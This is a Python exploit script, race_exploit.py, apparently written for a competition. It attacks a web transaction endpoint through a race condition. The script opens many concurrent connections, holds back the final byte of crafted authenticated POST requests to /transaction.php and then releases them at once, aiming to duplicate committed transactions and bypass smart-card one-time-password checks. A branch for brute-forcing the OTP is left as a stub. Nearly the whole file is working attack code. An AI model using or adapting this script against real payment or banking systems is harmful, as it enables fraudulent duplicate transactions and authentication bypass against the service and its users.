/
race_exploit.py
110 lines (91 loc) · 3.88 KB
/
race_exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
import asynchat
import asyncore
import socket
from config import TARGET_HOST, CONCURRENT_RACE, RE_TICKET
from misc import BaseForAll
import threading
__author__ = 'Gifts'
RaceCounterLock = threading.Condition()
RaceCounter = CONCURRENT_RACE
class HTTPRace(asynchat.async_chat):
def __init__(self, data, sock=None, map=None):
asynchat.async_chat.__init__(self, sock, map)
self.set_terminator(100)
self.ibuffer = []
self.push(data[:-1])
self.to_send = data
def collect_incoming_data(self, data):
self.ibuffer.append(data)
def found_terminator(self):
self.discard_buffers()
self.close_when_done()
def send_end(self):
self.push(self.to_send[-1])
def handle_close(self):
asynchat.async_chat.handle_close(self)
class RaceExploit(BaseForAll):
RaceLock = threading.Condition()
def __init__(self):
super(RaceExploit, self).__init__()
def set_obj(self, obj):
self.obj = obj
def create_connection(self):
pass
def run(self):
while 1:
with self.RaceLock:
self.RaceLock.wait()
try:
data = self._pre_otp(self.obj)
#sock = socket.create_connection((TARGET_HOST, 80))
if 'Commit transaction.' in data:
post_data = 'step=step3&' + ('a' * 1896)
step3 = "\r\n".join(
('POST /transaction.php HTTP/1.1'
, 'Host: {0}'.format(TARGET_HOST)
, 'Cookie: {0}'.format(self.obj.gen_auth_cookie())
, 'User-Agent: Python-urllib/2.7'
, 'Content-Type: application/x-www-form-urlencoded'
, 'Content-Length: {0}'.format(len(post_data))
, 'Connection: Close'
, ''
, post_data
)
)
a = [HTTPRace(step3, socket.create_connection((TARGET_HOST, 80))) for race_obj in
xrange(CONCURRENT_RACE)]
asyncore.loop(0.15, count=20)
map(lambda x: x.send_end(), a)
asyncore.loop(0.15, count=30)
# 2) SmartCard otp
elif 'One-time password:' in data:
post_data = 'step=step4&' + ('a' * 4096 * 2)
step4 = "\r\n".join(('POST /transaction.php HTTP/1.1'
, 'Host: {0}'.format(TARGET_HOST)
, 'Cookie: {0}'.format(self.obj.gen_auth_cookie())
, 'User-Agent: Python-urllib/2.7'
, 'Content-Type: application/x-www-form-urlencoded'
, 'Content-Length: {0}'.format(len(post_data))
, 'Connection: Close'
, ''
, post_data
))
a = [HTTPRace(step4, socket.create_connection((TARGET_HOST, 80))) for race_obj in
xrange(CONCURRENT_RACE)]
asyncore.loop(0.15, count=20)
map(lambda x: x.send_end(), a)
asyncore.loop(0.15, count=30)
# 3) Brute otp
elif 'One-time password (#' in data:
tmp_ticket = RE_TICKET.search(data)
if not tmp_ticket:
return False
tmp_ticket = tmp_ticket.group(1)
# Implement dupe for OTP list
except Exception as e:
raise
finally:
with self.RaceLock:
self.RaceLock.notify()
RaceObject = RaceExploit()
RaceObject.start()